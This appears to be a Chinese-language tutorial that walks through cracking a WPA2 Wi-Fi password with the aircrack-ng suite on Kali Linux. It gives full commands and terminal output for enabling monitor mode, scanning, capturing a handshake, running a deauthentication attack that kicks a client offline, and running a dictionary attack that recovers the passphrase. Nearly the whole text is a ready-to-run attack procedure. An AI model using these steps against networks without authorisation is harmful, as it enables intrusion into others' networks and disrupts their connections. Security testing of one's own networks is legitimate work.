获取 wifi信息
- 检查网卡是否支持监听模式
┌──(root㉿kali)-[~]
└─# airmon-ng
PHY Interface Driver Chipset
phy0 wlan0 rtl8xxxu Realtek Semiconductor Corp. RTL8188FTV 802.11b/g/n 1T1R 2.4G WLAN Adapter
- 打开网卡监听模式
┌──(root㉿kali)-[~]
└─# airmon-ng start wlan0
Found 3 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
712 dhclient
924 NetworkManager
1805 wpa_supplicant
PHY Interface Driver Chipset
phy0 wlan0 rtl8xxxu Realtek Semiconductor Corp. RTL8188FTV 802.11b/g/n 1T1R 2.4G WLAN Adapter
(monitor mode enabled)
- 扫描当前环境
WiFi信号
┌──(root㉿kali)-[~]
└─# airodump-ng wlan0
Warning: Detected you are using a non-UNICODE terminal character encoding.
CH 13 ][ Elapsed: 6 s ][ 2024-12-02 19:09
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8E:C2:81:13:D0:AD -63 31 1 0 11 360 WPA2 CCMP PSK umr
BSSID STATION PWR Rate Lost Frames Notes Probes
8E:C2:81:13:D0:AD E8:C8:29:BB:0A:99 -15 0 - 6e 0 1
8E:C2:81:13:D0:AD BE:BF:5E:2A:12:13 -77 0 - 1e 47 27
Quitting...
获取握手数据文件
- 等待握手数据包, 这个命令窗口不要关闭
┌──(root㉿kali)-[~]
└─# airodump-ng -c 11 --bssid 8E:C2:81:13:D0:AD -w /home/umr/Desktop/wifi/handshake wlan0
Warning: Detected you are using a non-UNICODE terminal character encoding.
19:10:10 Created capture file "/home/umr/Desktop/wifi/handshake-01.cap".
CH 11 ][ Elapsed: 0 s ][ 2024-12-02 19:10
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8E:C2:81:13:D0:AD -25 100 12 0 0 11 360 WPA2 CCMP PSK umr
BSSID STATION PWR Rate Lost Frames Notes Probes
8E:C2:81:13:D0:AD E8:C8:29:BB:0A:99 -16 0 - 6e 0 5
8E:C2:81:13:D0:AD BE:BF:5E:2A:12:13 -75 0 - 1e 0 17
Quitting...
需要使用扫描环境 WiFi 信号的数据
- -c 为
wifi信道CH的数据 - --bssid 为 wifi 标识符
- -w 为 数据文件保存地址
- wlan0 为 网卡名字
- ack死亡攻击,新打开一个命令窗口
┌──(root㉿kali)-[~]
└─# aireplay-ng -0 100 -a 8E:C2:81:13:D0:AD -c BE:BF:5E:2A:12:13 wlan0
- -0 表示吧设备踢下线
- 100 表示攻击次数
- -a 为 wifi 的标识符
- -c 为踢下线设备的mac地址
- 出现
[ WPA handshake: 8E:C2:81:13:D0:AD表示成功
19:10:41 Created capture file "/home/umr/Desktop/wifi/handshake-01.cap".
CH 11 ][ Elapsed: 3 mins ][ 2024-12-02 19:14 ][ WPA handshake: 8E:C2:81:13:D0:AD
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
8E:C2:81:13:D0:AD -21 100 2107 161 0 11 360 WPA2 CCMP PSK umr
BSSID STATION PWR Rate Lost Frames Notes Probes
8E:C2:81:13:D0:AD E8:C8:29:BB:0A:99 -17 1e- 6e 0 1141
8E:C2:81:13:D0:AD BE:BF:5E:2A:12:13 -71 1e- 1e 177 2250 EAPOL umr
handshake-01.cap就是握手数据文件
┌──(root㉿kali)-[/home/umr/Desktop/wifi]
└─# ll /home/umr/Desktop/wifi/
total 2556
-rw-r--r-- 1 root root 1402386 Dec 2 19:16 handshake-01.cap
-rw-r--r-- 1 root root 572 Dec 2 19:16 handshake-01.csv
-rw-r--r-- 1 root root 587 Dec 2 19:16 handshake-01.kismet.csv
-rw-r--r-- 1 root root 4031 Dec 2 19:16 handshake-01.kismet.netxml
-rw-r--r-- 1 root root 1200128 Dec 2 19:16 handshake-01.log.csv
破解
- 开始破解
┌──(root㉿kali)-[/home/umr/Desktop/wifi]
└─# aircrack-ng -w /home/umr/Desktop/pswd/password_all.txt -b 8E:C2:81:13:D0:AD /home/umr/Desktop/wifi/handshake-01.cap
Reading packets, please wait...
Opening /home/umr/Desktop/wifi/handshake-01.cap
Read 63570 packets.
1 potential targets
Aircrack-ng 1.7
[00:00:09] 119905/2814819 keys tested (13136.08 k/s)
Time left: 3 minutes, 25 seconds 4.26%
Current passphrase: d19720411
Master Key : 59 FD 9B 27 E2 AC 5A 97 42 18 64 FF 4A 62 29 A3
71 6D 0B 91 B4 26 3D 3A 8D 8B 81 69 4F 6E 8E CE
Transient Key : 85 59 FD 8E DF E0 56 36 AF CC 5A E5 21 93 78 DD
4A F5 4D 97 86 C9 65 0B 49 75 00 B4 65 CC CF 32
49 5E FF F9 0B 02 F3 05 71 E9 FC 7B 16 ED EA B8
3F 8F 27 73 C3 D8 29 84 7A 36 C7 59 88 71 16 AD
EAPOL HMAC : A6 58 13 6D 25 9F 64 56 79 5E 1E EF 8C DE 5A 7C
- 显示
KEY FOUND! [ 1234qwer ]表示破解成功
┌──(root㉿kali)-[~]
└─# aircrack-ng -w /home/umr/Desktop/pswd/password_all.txt -b 8E:C2:81:13:D0:AD /home/umr/Desktop/wifi/handshake-01.cap
Reading packets, please wait...
Opening /home/umr/Desktop/wifi/handshake-01.cap
Read 65570 packets.
1 potential targets
Aircrack-ng 1.7
[00:02:29] 1930033/2814819 keys tested (13163.19 k/s)
Time left: 1 minute, 7 seconds 68.57%
KEY FOUND! [ 1234qwer ]
Master Key : 29 47 4D 9E 6B 25 DA FA 2B 1A 6F 32 E2 D0 18 72
14 A3 36 43 50 9D 3C D2 EF E3 20 99 C0 2A 13 FA
Transient Key : 59 78 9A 21 BB AA 85 1F 8C B3 06 C7 7E 3A 35 2A
75 19 03 02 E2 ED 1C 8A C5 70 89 A7 41 22 13 19
2C 2A 88 1A FE D9 A5 CA CC 02 71 8D 43 BC 44 E2
04 62 AA D7 7B 06 72 65 78 DC C6 2F 80 4A AF BC
EAPOL HMAC : C9 49 7F B9 96 90 41 7A 90 21 0E 0B 54 73 EF D8